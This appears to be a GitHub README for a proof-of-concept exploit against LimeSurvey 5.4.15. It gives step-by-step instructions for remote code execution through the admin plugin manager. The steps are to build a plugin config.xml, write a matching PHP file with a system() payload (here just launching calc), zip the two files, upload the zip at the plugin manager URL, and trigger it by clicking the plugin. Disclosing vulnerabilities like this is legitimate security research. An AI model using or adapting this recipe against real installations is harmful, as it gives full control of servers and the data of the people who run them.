Skip to content

Sakura-501/LimeSurvey-5.4.15-PluginUploadtoRCE

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 
 
 

LimeSurvey-5.4.15-PluginUploadtoRCE

In LimeSurvey-5.4.15, it has a vulnerability in index.php/admin/pluginmanager which can lead to RCE

Impact: Complete control of the system.

The directory structure of the files we need is as follows:

image

Here are the attack steps:

  1. Create a config.xml as follows, and remember the name->exp:
<?xml version="1.0" encoding="UTF-8"?>
<config>
    <metadata>
        <name>exp</name>
        <type>plugin</type>
        <creationDate>2021-11-18</creationDate>
        <lastUpdate>2021-11-23</lastUpdate>
        <author>Denis Chenu (for Respondage)</author>
        <authorUrl>https://www.respondage.nl</authorUrl>
        <supportUrl>https://www.limesurvey.org</supportUrl>
        <version>0.2.1</version>
        <license>GNU General Public License version 3 or later</license>
        <description><![CDATA[Expression Script: make answer option text available; see settings for documentation and usage.]]></description>
    </metadata>

    <compatibility>
        <version>5.0</version>
    </compatibility>

    <updaters disabled="disabled">
    </updaters>
</config>
  1. Create a php file with the same name(exp) exp.php and fill your payload, like the following example:
<?php
system('calc');
?>
  1. Compress config.xml and exp.php into one compressed package like exp.zip:

  2. Upload this exp.zip file in /index.php/admin/pluginmanager?sa=index :

image

  1. Finally, when you click the plugin that uploaded, the php payload will be triggered:

image

image

About

In LimeSurvey5.4.15, it has a vulnerability in index.php/admin/pluginmanager which can lead to RCE

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages